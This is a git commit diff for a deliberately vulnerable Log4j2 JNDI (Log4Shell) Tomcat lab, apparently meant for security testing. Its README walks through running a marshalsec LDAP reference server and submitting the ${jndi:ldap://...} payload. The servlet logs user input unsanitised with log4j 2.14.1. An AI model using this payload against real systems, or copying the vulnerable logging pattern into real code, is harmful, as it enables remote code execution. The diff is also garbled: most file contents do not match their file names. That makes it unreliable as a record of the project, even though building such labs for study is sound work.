first commit

Author: jweny

.gitignore

@@ -0,0 +1,20 @@
+.idea/
+.DS_Store
+
+# Binaries for programs and plugins
+*.exe
+*.exe~
+*.dll
+*.so
+*.dylib
+
+# Test binary, built with `go test -c`
+*.test
+_test
+_testmain.go
+
+# Output of the go coverage tool, specifically when used with LiteIDE
+*.out
+
+# Dependency directories (remove the comment below to include it)
+vendor/

README.md

@@ -0,0 +1,29 @@
+# log4j2 jndi tomcat 漏洞环境
+
+## 部署war包
+
+```
+mv log4j_demo/out/artifacts/log4j_demo tomcat/webapps
+```
+
+## 基础操作
+
+```
+cd marshalsec
+
+python3 -m http.server 8888
+
+java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://127.0.0.1:8888/#Exp 1099
+```
+
+## 测试
+
+```
+${jndi:ldap://127.0.0.1:1099/Exp}
+```
+
+![image-20211210160538626](pic/image-20211210160538626.png)
+
+
+
+![image-20211210160816201](pic/image-20211210160816201.png)

log4j_demo/log4j_demo.iml

@@ -0,0 +1,24 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<module type="JAVA_MODULE" version="4">
+  <component name="FacetManager">
+    <facet type="web" name="Web">
+      <configuration>
+        <descriptors>
+          <deploymentDescriptor name="web.xml" url="file://$MODULE_DIR$/web/WEB-INF/web.xml" />
+        </descriptors>
+        <webroots>
+          <root url="file://$MODULE_DIR$/web" relative="/" />
+        </webroots>
+      </configuration>
+    </facet>
+  </component>
+  <component name="NewModuleRootManager" inherit-compiler-output="true">
+    <exclude-output />
+    <content url="file://$MODULE_DIR$">
+      <sourceFolder url="file://$MODULE_DIR$/src" isTestSource="false" />
+    </content>
+    <orderEntry type="inheritedJdk" />
+    <orderEntry type="sourceFolder" forTests="false" />
+    <orderEntry type="library" name="lib" level="project" />
+  </component>
+</module>

log4j_demo/out/artifacts/log4j_demo/log4j_demo.war

@@ -0,0 +1,16 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
+         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+         xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
+         version="4.0">
+
+    <servlet>
+        <servlet-name>hello</servlet-name>
+        <servlet-class>HelloServlet</servlet-class>
+    </servlet>
+    <servlet-mapping>
+        <servlet-name>hello</servlet-name>
+        <url-pattern>/hello</url-pattern>
+    </servlet-mapping>
+
+</web-app>

log4j_demo/out/artifacts/log4j_demo_war_exploded/WEB-INF/classes/HelloServlet.class

@@ -0,0 +1,13 @@
+<%@ page contentType="text/html;charset=UTF-8" language="java" %>
+<html>
+  <head>
+    <title>Log4j Demo</title>
+  </head>
+  <body>
+  Log
+  <form action="hello" method="post">
+    <input type="text" name="log" />
+    <input type="submit" value="Submit" />
+  </form>
+  </body>
+</html>

log4j_demo/out/artifacts/log4j_demo_war_exploded/WEB-INF/lib/log4j-api-2.14.1.jar

@@ -0,0 +1,24 @@
+import org.apache.logging.log4j.LogManager;
+import org.apache.logging.log4j.Logger;
+
+import javax.servlet.ServletException;
+import javax.servlet.http.HttpServlet;
+import javax.servlet.http.HttpServletRequest;
+import javax.servlet.http.HttpServletResponse;
+import java.io.IOException;
+
+public class HelloServlet extends HttpServlet {
+
+    public static final Logger logger = LogManager.getLogger(HelloServlet.class);
+
+    @Override
+    public void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
+        resp.getWriter().println("doGet");
+    }
+
+    @Override
+    protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
+        String log = req.getParameter("log");
+        logger.error(log);
+    }
+}

log4j_demo/out/artifacts/log4j_demo_war_exploded/WEB-INF/lib/log4j-core-2.14.1.jar

@@ -0,0 +1,16 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
+         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+         xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
+         version="4.0">
+
+    <servlet>
+        <servlet-name>hello</servlet-name>
+        <servlet-class>HelloServlet</servlet-class>
+    </servlet>
+    <servlet-mapping>
+        <servlet-name>hello</servlet-name>
+        <url-pattern>/hello</url-pattern>
+    </servlet-mapping>
+
+</web-app>

log4j_demo/out/artifacts/log4j_demo_war_exploded/WEB-INF/lib/servlet-api.jar

@@ -0,0 +1,13 @@
+<%@ page contentType="text/html;charset=UTF-8" language="java" %>
+<html>
+  <head>
+    <title>Log4j Demo</title>
+  </head>
+  <body>
+  Log
+  <form action="hello" method="post">
+    <input type="text" name="log" />
+    <input type="submit" value="Submit" />
+  </form>
+  </body>
+</html>

log4j_demo/out/artifacts/log4j_demo_war_exploded/WEB-INF/web.xml

@@ -0,0 +1 @@
+Subproject commit 2253360ccf4f768be3c73b37cd650aa7b2569f54